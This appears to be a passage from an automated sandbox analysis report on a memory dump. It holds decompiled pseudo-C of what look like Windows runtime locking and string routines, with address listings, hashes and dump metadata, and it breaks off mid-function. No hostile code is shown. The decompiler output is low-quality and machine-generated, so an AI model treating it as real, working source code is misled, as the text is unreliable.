				_t128 = 1;
				goto L39;
			}

























                                                                                                                                                                0x02030b21
                                                                                                                                                                0x02030b24
                                                                                                                                                                0x02030b27
                                                                                                                                                                0x02030b2a
                                                                                                                                                                0x02030b2d
                                                                                                                                                                0x02030b30
                                                                                                                                                                0x02030b33
                                                                                                                                                                0x02030b36
                                                                                                                                                                0x02030b39
                                                                                                                                                                0x02030b3e
                                                                                                                                                                0x02030c65
                                                                                                                                                                0x02030c68
                                                                                                                                                                0x02030c6a
                                                                                                                                                                0x02030c6f
                                                                                                                                                                0x0205eb42
                                                                                                                                                                0x00000000
                                                                                                                                                                0x00000000
                                                                                                                                                                0x0205eb48
                                                                                                                                                                0x0205eb48
                                                                                                                                                                0x02030c75
                                                                                                                                                                0x02030c7a
                                                                                                                                                                0x0205eb54
                                                                                                                                                                0x00000000
                                                                                                                                                                0x00000000
                                                                                                                                                                0x00000000
                                                                                                                                                                0x0205eb5a
                                                                                                                                                                0x02030c80
                                                                                                                                                                0x02030c84
                                                                                                                                                                0x0205eb98
                                                                                                                                                                0x00000000
                                                                                                                                                                0x00000000
                                                                                                                                                                0x0205eba6
                                                                                                                                                                0x02030cb8
                                                                                                                                                                0x02030cba
                                                                                                                                                                0x02030cd3
                                                                                                                                                                0x02030cda
                                                                                                                                                                0x02030ce4
                                                                                                                                                                0x02030ce9
                                                                                                                                                                0x00000000
                                                                                                                                                                0x02030cec
                                                                                                                                                                0x02030c8c
                                                                                                                                                                0x0205eb63
                                                                                                                                                                0x00000000
                                                                                                                                                                0x00000000
                                                                                                                                                                0x0205eb70
                                                                                                                                                                0x0205eb75
                                                                                                                                                                0x0205eb7d
                                                                                                                                                                0x00000000
                                                                                                                                                                0x00000000
                                                                                                                                                                0x0205eb8c
                                                                                                                                                                0x00000000
                                                                                                                                                                0x0205eb8c
                                                                                                                                                                0x02030c96
                                                                                                                                                                0x00000000
                                                                                                                                                                0x00000000
                                                                                                                                                                0x02030ca2
                                                                                                                                                                0x02030cac
                                                                                                                                                                0x02030cb4
                                                                                                                                                                0x00000000
                                                                                                                                                                0x00000000
                                                                                                                                                                0x02030b44
                                                                                                                                                                0x02030b47
                                                                                                                                                                0x02030b49
                                                                                                                                                                0x00000000
                                                                                                                                                                0x00000000
                                                                                                                                                                0x02030b4f
                                                                                                                                                                0x02030b50
                                                                                                                                                                0x00000000
                                                                                                                                                                0x00000000
                                                                                                                                                                0x02030b56
                                                                                                                                                                0x02030b62
                                                                                                                                                                0x02030b7c
                                                                                                                                                                0x02030bac
                                                                                                                                                                0x02030a0f
                                                                                                                                                                0x0205eaaa
                                                                                                                                                                0x00000000
                                                                                                                                                                0x0205eac4
                                                                                                                                                                0x0205eac4
                                                                                                                                                                0x02030bd0
                                                                                                                                                                0x02030bd0
                                                                                                                                                                0x02030bd4
                                                                                                                                                                0x02030bd9
                                                                                                                                                                0x00000000
                                                                                                                                                                0x00000000
                                                                                                                                                                0x02030bdb
                                                                                                                                                                0x02030be0
                                                                                                                                                                0x0205eb0e
                                                                                                                                                                0x02030a1a
                                                                                                                                                                0x00000000
                                                                                                                                                                0x02030a1a
                                                                                                                                                                0x0205eb1a
                                                                                                                                                                0x0205eb1f
                                                                                                                                                                0x0205eb27
                                                                                                                                                                0x00000000
                                                                                                                                                                0x00000000
                                                                                                                                                                0x0205eb36
                                                                                                                                                                0x00000000
                                                                                                                                                                0x0205eb36
                                                                                                                                                                0x02030bea
                                                                                                                                                                0x00000000
                                                                                                                                                                0x00000000
                                                                                                                                                                0x02030bf6
                                                                                                                                                                0x02030c00
                                                                                                                                                                0x02030c03
                                                                                                                                                                0x02030c0b
                                                                                                                                                                0x00000000
                                                                                                                                                                0x02030c0b
                                                                                                                                                                0x0205eaaa
                                                                                                                                                                0x00000000
                                                                                                                                                                0x02030a15
                                                                                                                                                                0x02030bb6
                                                                                                                                                                0x00000000
                                                                                                                                                                0x02030bc6
                                                                                                                                                                0x02030bc6
                                                                                                                                                                0x02030bcb
                                                                                                                                                                0x02030c15
                                                                                                                                                                0x00000000
                                                                                                                                                                0x00000000
                                                                                                                                                                0x02030c1d
                                                                                                                                                                0x02030c20
                                                                                                                                                                0x02030c21
                                                                                                                                                                0x02030c24
                                                                                                                                                                0x02030c24
                                                                                                                                                                0x02030c26
                                                                                                                                                                0x00000000
                                                                                                                                                                0x02030c26
                                                                                                                                                                0x02030bcd
                                                                                                                                                                0x00000000
                                                                                                                                                                0x02030bcd
                                                                                                                                                                0x02030b89
                                                                                                                                                                0x02030b89
                                                                                                                                                                0x02030b90
                                                                                                                                                                0x00000000
                                                                                                                                                                0x00000000
                                                                                                                                                                0x02030b96
                                                                                                                                                                0x00000000
                                                                                                                                                                0x02030b96
                                                                                                                                                                0x02030a04
                                                                                                                                                                0x02030a04
                                                                                                                                                                0x02030b9a
                                                                                                                                                                0x02030b9a
                                                                                                                                                                0x02030b9b
                                                                                                                                                                0x02030b9f
                                                                                                                                                                0x00000000
                                                                                                                                                                0x00000000
                                                                                                                                                                0x00000000
                                                                                                                                                                0x02030ba5
                                                                                                                                                                0x02030ac7
                                                                                                                                                                0x02030aca
                                                                                                                                                                0x0205eacf
                                                                                                                                                                0x00000000
                                                                                                                                                                0x0205eade
                                                                                                                                                                0x0205eade
                                                                                                                                                                0x0205eae3
                                                                                                                                                                0x00000000
                                                                                                                                                                0x00000000
                                                                                                                                                                0x0205eaf3
                                                                                                                                                                0x0205eaf6
                                                                                                                                                                0x0205eaf7
                                                                                                                                                                0x0205eafe
                                                                                                                                                                0x0205eb01
                                                                                                                                                                0x00000000
                                                                                                                                                                0x0205eb01
                                                                                                                                                                0x0205eacf
                                                                                                                                                                0x02030ad0
                                                                                                                                                                0x02030ad4
                                                                                                                                                                0x00000000
                                                                                                                                                                0x00000000
                                                                                                                                                                0x02030ada
                                                                                                                                                                0x02030ae6
                                                                                                                                                                0x02030c34
                                                                                                                                                                0x00000000
                                                                                                                                                                0x02030c47
                                                                                                                                                                0x02030c49
                                                                                                                                                                0x02030c4a
                                                                                                                                                                0x02030c4e
                                                                                                                                                                0x02030c51
                                                                                                                                                                0x02030c54
                                                                                                                                                                0x02030c57
                                                                                                                                                                0x02030c5a
                                                                                                                                                                0x00000000
                                                                                                                                                                0x00000000
                                                                                                                                                                0x00000000
                                                                                                                                                                0x02030c60
                                                                                                                                                                0x02030afb
                                                                                                                                                                0x02030afe
                                                                                                                                                                0x02030b02
                                                                                                                                                                0x02030b05
                                                                                                                                                                0x02030b08
                                                                                                                                                                0x00000000
                                                                                                                                                                0x02030b08
                                                                                                                                                                0x02030ae6
                                                                                                                                                                0x02030b44
                                                                                                                                                                0x020309f8
                                                                                                                                                                0x020309f8
                                                                                                                                                                0x020309f9
                                                                                                                                                                0x00000000
                                                                                                                                                                0x00000000
                                                                                                                                                                0x0205eaa0
                                                                                                                                                                0x00000000

                                                                                                                                                                APIs
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000009.00000002.2371265151.0000000001FE0000.00000040.00000001.sdmp, Offset: 01FD0000, based on PE: true
                                                                                                                                                                • Associated: 00000009.00000002.2371260420.0000000001FD0000.00000040.00000001.sdmp Download File
                                                                                                                                                                • Associated: 00000009.00000002.2371338809.00000000020C0000.00000040.00000001.sdmp Download File
                                                                                                                                                                • Associated: 00000009.00000002.2371344209.00000000020D0000.00000040.00000001.sdmp Download File
                                                                                                                                                                • Associated: 00000009.00000002.2371349487.00000000020D4000.00000040.00000001.sdmp Download File
                                                                                                                                                                • Associated: 00000009.00000002.2371354968.00000000020D7000.00000040.00000001.sdmp Download File
                                                                                                                                                                • Associated: 00000009.00000002.2371360264.00000000020E0000.00000040.00000001.sdmp Download File
                                                                                                                                                                • Associated: 00000009.00000002.2371398748.0000000002140000.00000040.00000001.sdmp Download File
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: __fassign
                                                                                                                                                                • String ID: .$:$:
                                                                                                                                                                • API String ID: 3965848254-2308638275
                                                                                                                                                                • Opcode ID: b15de34944a390e3fa5e98378680e2de18144008d38fd4e6897fe19ea25b26ab
                                                                                                                                                                • Instruction ID: 6e415029d22b1e3c99dedefabc2aad0345435b35adb30ce957f4d60b26fb25a5
                                                                                                                                                                • Opcode Fuzzy Hash: b15de34944a390e3fa5e98378680e2de18144008d38fd4e6897fe19ea25b26ab
                                                                                                                                                                • Instruction Fuzzy Hash: 09A1AB7191230AEEDF26CF64C8446EEBBBEAF05309F24846AD842A7281D7319645EB51
                                                                                                                                                                Uniqueness

                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                Function 02030554, Relevance: 10.7, APIs: 2, Strings: 4, Instructions: 202COMMON
                                                                                                                                                                Download Yara Rule
                                                                                                                                                                C-Code - Quality: 50%
                                                                                                                                                                			E02030554(signed int _a4, char _a8) {
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int* _t49;
				signed int _t51;
				signed int _t56;
				signed int _t58;
				signed int _t61;
				signed int _t63;
				void* _t66;
				intOrPtr _t67;
				void* _t69;
				signed int _t70;
				void* _t75;
				signed int _t81;
				signed int _t84;
				void* _t86;
				signed int _t93;
				signed int _t96;
				intOrPtr _t105;
				signed int _t107;
				void* _t110;
				signed int _t115;
				signed int* _t119;
				void* _t125;
				void* _t126;
				signed int _t128;
				signed int _t130;
				signed int _t138;
				signed int _t144;
				void* _t158;
				void* _t159;
				void* _t160;

				_t96 = _a4;
				_t115 =  *(_t96 + 0x28);
				_push(_t138);
				if(_t115 < 0) {
					_t105 =  *[fs:0x18];
					__eflags =  *((intOrPtr*)(_t96 + 0x2c)) -  *((intOrPtr*)(_t105 + 0x24));
					if( *((intOrPtr*)(_t96 + 0x2c)) !=  *((intOrPtr*)(_t105 + 0x24))) {
						goto L6;
					} else {
						__eflags = _t115 | 0xffffffff;
						asm("lock xadd [eax], edx");
						return 1;
					}
				} else {
					L6:
					_push(_t128);
					while(1) {
						L7:
						__eflags = _t115;
						if(_t115 >= 0) {
							break;
						}
						__eflags = _a8;
						if(_a8 == 0) {
							__eflags = 0;
							return 0;
						} else {
							 *((intOrPtr*)( *((intOrPtr*)(_t96 + 0x34)) + 0x14)) =  *((intOrPtr*)( *((intOrPtr*)(_t96 + 0x34)) + 0x14)) + 1;
							_t49 = _t96 + 0x1c;
							_t106 = 1;
							asm("lock xadd [edx], ecx");
							_t115 =  *(_t96 + 0x28);
							__eflags = _t115;
							if(_t115 < 0) {
								L23:
								_t130 = 0;
								__eflags = 0;
								while(1) {
									_t118 =  *(_t96 + 0x30) & 0x00000001;
									asm("sbb esi, esi");
									_t144 =  !( ~( *(_t96 + 0x30) & 1)) & 0x020d01c0;
									_push(_t144);
									_push(0);
									_t51 = E01FEF8CC( *((intOrPtr*)(_t96 + 0x18)));
									__eflags = _t51 - 0x102;
									if(_t51 != 0x102) {
										break;
									}
									_t106 =  *(_t144 + 4);
									_t126 =  *_t144;
									_t86 = E02034FC0(_t126,  *(_t144 + 4), 0xff676980, 0xffffffff);
									_push(_t126);
									_push(_t86);
									E02043F92(0x65, 0, "RTL: Acquire Shared Sem Timeout %d(%I64u secs)\n", _t130);
									E02043F92(0x65, 0, "RTL: Resource at %p\n", _t96);
									_t130 = _t130 + 1;
									_t160 = _t158 + 0x28;
									__eflags = _t130 - 2;
									if(__eflags > 0) {
										E0207217A(_t106, __eflags, _t96);
									}
									_push("RTL: Re-Waiting\n");
									_push(0);
									_push(0x65);
									E02043F92();
									_t158 = _t160 + 0xc;
								}
								__eflags = _t51;
								if(__eflags < 0) {
									_push(_t51);
									E02033915(_t96, _t106, _t118, _t130, _t144, __eflags);
									asm("int3");
									while(1) {
										L32:
										__eflags = _a8;
										if(_a8 == 0) {
											break;
										}
										 *((intOrPtr*)( *((intOrPtr*)(_t96 + 0x34)) + 0x14)) =  *((intOrPtr*)( *((intOrPtr*)(_t96 + 0x34)) + 0x14)) + 1;
										_t119 = _t96 + 0x24;
										_t107 = 1;
										asm("lock xadd [eax], ecx");
										_t56 =  *(_t96 + 0x28);
										_a4 = _t56;
										__eflags = _t56;
										if(_t56 != 0) {
											L40:
											_t128 = 0;
											__eflags = 0;
											while(1) {
												_t121 =  *(_t96 + 0x30) & 0x00000001;
												asm("sbb esi, esi");
												_t138 =  !( ~( *(_t96 + 0x30) & 1)) & 0x020d01c0;
												_push(_t138);
												_push(0);
												_t58 = E01FEF8CC( *((intOrPtr*)(_t96 + 0x20)));
												__eflags = _t58 - 0x102;
												if(_t58 != 0x102) {
													break;
												}
												_t107 =  *(_t138 + 4);
												_t125 =  *_t138;
												_t75 = E02034FC0(_t125, _t107, 0xff676980, 0xffffffff);
												_push(_t125);
												_push(_t75);
												E02043F92(0x65, 0, "RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)\n", _t128);
												E02043F92(0x65, 0, "RTL: Resource at %p\n", _t96);
												_t128 = _t128 + 1;
												_t159 = _t158 + 0x28;
												__eflags = _t128 - 2;
												if(__eflags > 0) {
													E0207217A(_t107, __eflags, _t96);
												}
												_push("RTL: Re-Waiting\n");
												_push(0);
												_push(0x65);
												E02043F92();
												_t158 = _t159 + 0xc;
											}
											__eflags = _t58;
											if(__eflags < 0) {
												_push(_t58);
												E02033915(_t96, _t107, _t121, _t128, _t138, __eflags);
												asm("int3");
												_t61 =  *_t107;
												 *_t107 = 0;
												__eflags = _t61;
												if(_t61 == 0) {
													L1:
													_t63 = E02015384(_t138 + 0x24);
													if(_t63 != 0) {
														goto L52;
													} else {
														goto L2;
													}
												} else {
													_t123 =  *((intOrPtr*)(_t138 + 0x18));
													_push( &_a4);
													_push(_t61);
													_t70 = E01FEF970( *((intOrPtr*)(_t138 + 0x18)));
													__eflags = _t70;
													if(__eflags >= 0) {
														goto L1;
													} else {
														_push(_t70);
														E02033915(_t96,  &_a4, _t123, _t128, _t138, __eflags);
														L52:
														_t122 =  *((intOrPtr*)(_t138 + 0x20));
														_push( &_a4);
														_push(1);
														_t63 = E01FEF970( *((intOrPtr*)(_t138 + 0x20)));
														__eflags = _t63;
														if(__eflags >= 0) {
															L2:
															return _t63;
														} else {
															_push(_t63);
															E02033915(_t96,  &_a4, _t122, _t128, _t138, __eflags);
															_t109 =  *((intOrPtr*)(_t138 + 0x20));
															_push( &_a4);
															_push(1);
															_t63 = E01FEF970( *((intOrPtr*)(_t138 + 0x20)));
															__eflags = _t63;
															if(__eflags >= 0) {
																goto L2;
															} else {
																_push(_t63);
																_t66 = E02033915(_t96, _t109, _t122, _t128, _t138, __eflags);
																asm("int3");
																while(1) {
																	_t110 = _t66;
																	__eflags = _t66 - 1;
																	if(_t66 != 1) {
																		break;
																	}
																	_t128 = _t128 | 0xffffffff;
																	_t66 = _t110;
																	asm("lock cmpxchg [ebx], edi");
																	__eflags = _t66 - _t110;
																	if(_t66 != _t110) {
																		continue;
																	} else {
																		_t67 =  *[fs:0x18];
																		 *((intOrPtr*)(_t138 + 0x2c)) =  *((intOrPtr*)(_t67 + 0x24));
																		return _t67;
																	}
																	goto L59;
																}
																E02015329(_t110, _t138);
																_t69 = E020153A5(_t138, 1);
																return _t69;
															}
														}
													}
												}
											} else {
												_t56 =  *(_t96 + 0x28);
												goto L3;
											}
										} else {
											_t107 =  *_t119;
											__eflags = _t107;
											if(__eflags > 0) {
												while(1) {
													_t81 = _t107;
													asm("lock cmpxchg [edi], esi");
													__eflags = _t81 - _t107;
													if(_t81 == _t107) {
														break;
													}
													_t107 = _t81;
													__eflags = _t81;
													if(_t81 > 0) {
														continue;
													}
													break;
												}
												_t56 = _a4;
												__eflags = _t107;
											}
											if(__eflags != 0) {
												while(1) {
													L3:
													__eflags = _t56;
													if(_t56 != 0) {
														goto L32;
													}
													_t107 = _t107 | 0xffffffff;
													_t56 = 0;
													asm("lock cmpxchg [edx], ecx");
													__eflags = 0;
													if(0 != 0) {
														continue;
													} else {
														 *((intOrPtr*)(_t96 + 0x2c)) =  *((intOrPtr*)( *[fs:0x18] + 0x24));
														return 1;
													}
													goto L59;
												}
												continue;
											} else {
												goto L40;
											}
										}
										goto L59;
									}
									__eflags = 0;
									return 0;
								} else {
									_t115 =  *(_t96 + 0x28);
									continue;
								}
							} else {
								_t106 =  *_t49;
								__eflags = _t106;
								if(__eflags > 0) {
									while(1) {
										_t93 = _t106;
										asm("lock cmpxchg [edi], esi");
										__eflags = _t93 - _t106;
										if(_t93 == _t106) {
											break;
										}
										_t106 = _t93;
										__eflags = _t93;
										if(_t93 > 0) {
											continue;
										}
										break;
									}
									__eflags = _t106;
								}
								if(__eflags != 0) {
									continue;
								} else {
									goto L23;
								}
							}
						}
						goto L59;
					}
					_t84 = _t115;
					asm("lock cmpxchg [esi], ecx");
					__eflags = _t84 - _t115;
					if(_t84 != _t115) {
						_t115 = _t84;
						goto L7;
					} else {
						return 1;
					}
				}
				L59:
			}




































                                                                                                                                                                0x0203055a
                                                                                                                                                                0x0203055d
                                                                                                                                                                0x02030563
                                                                                                                                                                0x02030566
                                                                                                                                                                0x020305d8
                                                                                                                                                                0x020305e2
                                                                                                                                                                0x020305e5
                                                                                                                                                                0x00000000
                                                                                                                                                                0x020305e7
                                                                                                                                                                0x020305e7
                                                                                                                                                                0x020305ea
                                                                                                                                                                0x020305f3
                                                                                                                                                                0x020305f3
                                                                                                                                                                0x02030568
                                                                                                                                                                0x02030568
                                                                                                                                                                0x02030568
                                                                                                                                                                0x02030569
                                                                                                                                                                0x02030569
                                                                                                                                                                0x02030569
                                                                                                                                                                0x0203056b
                                                                                                                                                                0x00000000
                                                                                                                                                                0x00000000
                                                                                                                                                                0x0205217f
                                                                                                                                                                0x02052183
                                                                                                                                                                0x0205225b
                                                                                                                                                                0x0205225f
                                                                                                                                                                0x02052189
                                                                                                                                                                0x0205218c
                                                                                                                                                                0x0205218f
                                                                                                                                                                0x02052194
                                                                                                                                                                0x02052199
                                                                                                                                                                0x0205219d
                                                                                                                                                                0x020521a0
                                                                                                                                                                0x020521a2
                                                                                                                                                                0x020521ce
                                                                                                                                                                0x020521ce
                                                                                                                                                                0x020521ce
                                                                                                                                                                0x020521d0
                                                                                                                                                                0x020521d6
                                                                                                                                                                0x020521de
                                                                                                                                                                0x020521e2
                                                                                                                                                                0x020521e8
                                                                                                                                                                0x020521e9
                                                                                                                                                                0x020521ec
                                                                                                                                                                0x020521f1
                                                                                                                                                                0x020521f6
                                                                                                                                                                0x00000000
                                                                                                                                                                0x00000000
                                                                                                                                                                0x020521f8
                                                                                                                                                                0x020521fb
                                                                                                                                                                0x02052206
                                                                                                                                                                0x0205220b
                                                                                                                                                                0x0205220c
                                                                                                                                                                0x02052217
                                                                                                                                                                0x02052226
                                                                                                                                                                0x0205222b
                                                                                                                                                                0x0205222c
                                                                                                                                                                0x0205222f
                                                                                                                                                                0x02052232
                                                                                                                                                                0x02052235
                                                                                                                                                                0x02052235
                                                                                                                                                                0x0205223a
                                                                                                                                                                0x0205223f
                                                                                                                                                                0x02052241
                                                                                                                                                                0x02052243
                                                                                                                                                                0x02052248
                                                                                                                                                                0x02052248
                                                                                                                                                                0x0205224d
                                                                                                                                                                0x0205224f
                                                                                                                                                                0x02052262
                                                                                                                                                                0x02052263
                                                                                                                                                                0x02052268
                                                                                                                                                                0x02052269
                                                                                                                                                                0x02052269
                                                                                                                                                                0x02052269
                                                                                                                                                                0x0205226d
                                                                                                                                                                0x00000000
                                                                                                                                                                0x00000000
                                                                                                                                                                0x02052276
                                                                                                                                                                0x02052279
                                                                                                                                                                0x0205227e
                                                                                                                                                                0x02052283
                                                                                                                                                                0x02052287
                                                                                                                                                                0x0205228a
                                                                                                                                                                0x0205228d
                                                                                                                                                                0x0205228f
                                                                                                                                                                0x020522bc
                                                                                                                                                                0x020522bc
                                                                                                                                                                0x020522bc
                                                                                                                                                                0x020522be
                                                                                                                                                                0x020522c4
                                                                                                                                                                0x020522cc
                                                                                                                                                                0x020522d0
                                                                                                                                                                0x020522d6
                                                                                                                                                                0x020522d7
                                                                                                                                                                0x020522da
                                                                                                                                                                0x020522df
                                                                                                                                                                0x020522e4
                                                                                                                                                                0x00000000
                                                                                                                                                                0x00000000
                                                                                                                                                                0x020522e6
                                                                                                                                                                0x020522e9
                                                                                                                                                                0x020522f4
                                                                                                                                                                0x020522f9
                                                                                                                                                                0x020522fa
                                                                                                                                                                0x02052305
                                                                                                                                                                0x02052314
                                                                                                                                                                0x02052319
                                                                                                                                                                0x0205231a
                                                                                                                                                                0x0205231d
                                                                                                                                                                0x02052320
                                                                                                                                                                0x02052323
                                                                                                                                                                0x02052323
                                                                                                                                                                0x02052328
                                                                                                                                                                0x0205232d
                                                                                                                                                                0x0205232f
                                                                                                                                                                0x02052331
                                                                                                                                                                0x02052336
                                                                                                                                                                0x02052336
                                                                                                                                                                0x0205233b
                                                                                                                                                                0x0205233d
                                                                                                                                                                0x02052350
                                                                                                                                                                0x02052351
                                                                                                                                                                0x02052356
                                                                                                                                                                0x02052359
                                                                                                                                                                0x02052359
                                                                                                                                                                0x0205235b
                                                                                                                                                                0x0205235d
                                                                                                                                                                0x02015367
                                                                                                                                                                0x0201536b
                                                                                                                                                                0x02015372
                                                                                                                                                                0x00000000
                                                                                                                                                                0x00000000
                                                                                                                                                                0x00000000
                                                                                                                                                                0x00000000
                                                                                                                                                                0x02052363
                                                                                                                                                                0x02052363
                                                                                                                                                                0x02052369
                                                                                                                                                                0x0205236a
                                                                                                                                                                0x0205236c
                                                                                                                                                                0x02052371
                                                                                                                                                                0x02052373
                                                                                                                                                                0x00000000
                                                                                                                                                                0x02052379
                                                                                                                                                                0x02052379
                                                                                                                                                                0x0205237a
                                                                                                                                                                0x0205237f
                                                                                                                                                                0x0205237f
                                                                                                                                                                0x02052385
                                                                                                                                                                0x02052386
                                                                                                                                                                0x02052389
                                                                                                                                                                0x0205238e
                                                                                                                                                                0x02052390
                                                                                                                                                                0x02015378
                                                                                                                                                                0x0201537c
                                                                                                                                                                0x02052396
                                                                                                                                                                0x02052396
                                                                                                                                                                0x02052397
                                                                                                                                                                0x0205239c
                                                                                                                                                                0x020523a2
                                                                                                                                                                0x020523a3
                                                                                                                                                                0x020523a6
                                                                                                                                                                0x020523ab
                                                                                                                                                                0x020523ad
                                                                                                                                                                0x00000000
                                                                                                                                                                0x020523b3
                                                                                                                                                                0x020523b3
                                                                                                                                                                0x020523b4
                                                                                                                                                                0x020523b9
                                                                                                                                                                0x020523ba
                                                                                                                                                                0x020523ba
                                                                                                                                                                0x020523bc
                                                                                                                                                                0x020523bf
                                                                                                                                                                0x00000000
                                                                                                                                                                0x00000000
                                                                                                                                                                0x02049153
                                                                                                                                                                0x02049158
                                                                                                                                                                0x0204915a
                                                                                                                                                                0x0204915e
                                                                                                                                                                0x02049160
                                                                                                                                                                0x00000000
                                                                                                                                                                0x02049166
                                                                                                                                                                0x02049166
                                                                                                                                                                0x02049171
                                                                                                                                                                0x02049176
                                                                                                                                                                0x02049176
                                                                                                                                                                0x00000000
                                                                                                                                                                0x02049160
                                                                                                                                                                0x020523c6
                                                                                                                                                                0x020523ce
                                                                                                                                                                0x020523d7
                                                                                                                                                                0x020523d7
                                                                                                                                                                0x020523ad
                                                                                                                                                                0x02052390
                                                                                                                                                                0x02052373
                                                                                                                                                                0x0205233f
                                                                                                                                                                0x0205233f
                                                                                                                                                                0x00000000
                                                                                                                                                                0x0205233f
                                                                                                                                                                0x02052291
                                                                                                                                                                0x02052291
                                                                                                                                                                0x02052293
                                                                                                                                                                0x02052295
                                                                                                                                                                0x0205229a
                                                                                                                                                                0x020522a1
                                                                                                                                                                0x020522a3
                                                                                                                                                                0x020522a7
                                                                                                                                                                0x020522a9
                                                                                                                                                                0x00000000
                                                                                                                                                                0x00000000
                                                                                                                                                                0x020522ab
                                                                                                                                                                0x020522ad
                                                                                                                                                                0x020522af
                                                                                                                                                                0x00000000
                                                                                                                                                                0x00000000
                                                                                                                                                                0x00000000
                                                                                                                                                                0x020522af
                                                                                                                                                                0x020522b1
                                                                                                                                                                0x020522b4
                                                                                                                                                                0x020522b4
                                                                                                                                                                0x020522b6
                                                                                                                                                                0x020153be
                                                                                                                                                                0x020153be
                                                                                                                                                                0x020153be
                                                                                                                                                                0x020153c0
                                                                                                                                                                0x00000000
                                                                                                                                                                0x00000000
                                                                                                                                                                0x020153cb
                                                                                                                                                                0x020153ce
                                                                                                                                                                0x020153d0
                                                                                                                                                                0x020153d4
                                                                                                                                                                0x020153d6
                                                                                                                                                                0x00000000
                                                                                                                                                                0x020153d8
                                                                                                                                                                0x020153e3
                                                                                                                                                                0x020153ea
                                                                                                                                                                0x020153ea
                                                                                                                                                                0x00000000
                                                                                                                                                                0x020153d6
                                                                                                                                                                0x00000000
                                                                                                                                                                0x00000000
                                                                                                                                                                0x00000000
                                                                                                                                                                0x00000000
                                                                                                                                                                0x020522b6
                                                                                                                                                                0x00000000
                                                                                                                                                                0x0205228f
                                                                                                                                                                0x02052349
                                                                                                                                                                0x0205234d
                                                                                                                                                                0x02052251
                                                                                                                                                                0x02052251
                                                                                                                                                                0x00000000
                                                                                                                                                                0x02052251
                                                                                                                                                                0x020521a4
                                                                                                                                                                0x020521a4
                                                                                                                                                                0x020521a6
                                                                                                                                                                0x020521a8
                                                                                                                                                                0x020521ac
                                                                                                                                                                0x020521b6
                                                                                                                                                                0x020521b8
                                                                                                                                                                0x020521bc
                                                                                                                                                                0x020521be
                                                                                                                                                                0x00000000
                                                                                                                                                                0x00000000
                                                                                                                                                                0x020521c0
                                                                                                                                                                0x020521c2
                                                                                                                                                                0x020521c4
                                                                                                                                                                0x00000000
                                                                                                                                                                0x00000000
                                                                                                                                                                0x00000000
                                                                                                                                                                0x020521c4
                                                                                                                                                                0x020521c6
                                                                                                                                                                0x020521c6
                                                                                                                                                                0x020521c8
                                                                                                                                                                0x00000000
                                                                                                                                                                0x00000000
                                                                                                                                                                0x00000000
                                                                                                                                                                0x00000000
                                                                                                                                                                0x020521c8
                                                                                                                                                                0x020521a2
                                                                                                                                                                0x00000000
                                                                                                                                                                0x02052183
                                                                                                                                                                0x0203057b
                                                                                                                                                                0x0203057d
                                                                                                                                                                0x02030581
                                                                                                                                                                0x02030583
                                                                                                                                                                0x02052178
                                                                                                                                                                0x00000000
                                                                                                                                                                0x02030589
                                                                                                                                                                0x0203058f
                                                                                                                                                                0x0203058f
                                                                                                                                                                0x02030583
                                                                                                                                                                0x00000000

                                                                                                                                                                APIs
                                                                                                                                                                • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 02052206
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000009.00000002.2371265151.0000000001FE0000.00000040.00000001.sdmp, Offset: 01FD0000, based on PE: true
                                                                                                                                                                • Associated: 00000009.00000002.2371260420.0000000001FD0000.00000040.00000001.sdmp Download File
                                                                                                                                                                • Associated: 00000009.00000002.2371338809.00000000020C0000.00000040.00000001.sdmp Download File
                                                                                                                                                                • Associated: 00000009.00000002.2371344209.00000000020D0000.00000040.00000001.sdmp Download File
                                                                                                                                                                • Associated: 00000009.00000002.2371349487.00000000020D4000.00000040.00000001.sdmp Download File
                                                                                                                                                                • Associated: 00000009.00000002.2371354968.00000000020D7000.00000040.00000001.sdmp Download File
                                                                                                                                                                • Associated: 00000009.00000002.2371360264.00000000020E0000.00000040.00000001.sdmp Download File
                                                                                                                                                                • Associated: 00000009.00000002.2371398748.0000000002140000.00000040.00000001.sdmp Download File
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                                                                                                                                • String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Acquire Shared Sem Timeout %d(%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                                                                                                                                • API String ID: 885266447-4236105082
                                                                                                                                                                • Opcode ID: 895d4687850683568f7a8f2962f7e37f3b27c324fc2aee6322a6200ea15ab533
                                                                                                                                                                • Instruction ID: 2f0489f553336f94015506ea53ed8f8994e0c7bd5b3b21c79fc0d6e59895927c
                                                                                                                                                                • Opcode Fuzzy Hash: 895d4687850683568f7a8f2962f7e37f3b27c324fc2aee6322a6200ea15ab533
                                                                                                                                                                • Instruction Fuzzy Hash: 995139757003116FEB16CA19CCC0FA773EAAF94710F258269ED45DF284DA71EC419B94
                                                                                                                                                                Uniqueness

                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                Function 020314C0, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 91COMMON
                                                                                                                                                                Download Yara Rule
                                                                                                                                                                C-Code - Quality: 64%
                                                                                                                                                                			E020314C0(void* __ecx, void* __edx, intOrPtr* _a4, intOrPtr _a8, signed int _a12, intOrPtr _a16, intOrPtr* _a20) {
				signed int _v8;
				char _v10;
				char _v140;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t24;
				void* _t26;
				signed int _t29;
				signed int _t34;
				signed int _t40;
				intOrPtr _t45;
				void* _t51;
				intOrPtr* _t52;
				void* _t54;
				signed int _t57;
				void* _t58;

				_t51 = __edx;
				_t24 =  *0x20d2088; // 0x776bdffd
				_v8 = _t24 ^ _t57;
				_t45 = _a16;
				_t53 = _a4;
				_t52 = _a20;
				if(_a4 == 0 || _t52 == 0) {
					L10:
					_t26 = 0xc000000d;
				} else {
					if(_t45 == 0) {
						if( *_t52 == _t45) {
							goto L3;
						} else {
							goto L10;
						}
					} else {
						L3:
						_t28 =  &_v140;
						if(_a12 != 0) {
							_push("[");
							_push(0x41);
							_push( &_v140);
							_t29 = E02027707();
							_t58 = _t58 + 0xc;
							_t28 = _t57 + _t29 * 2 - 0x88;
						}
						_t54 = E020313CB(_t53, _t28);
						if(_a8 != 0) {
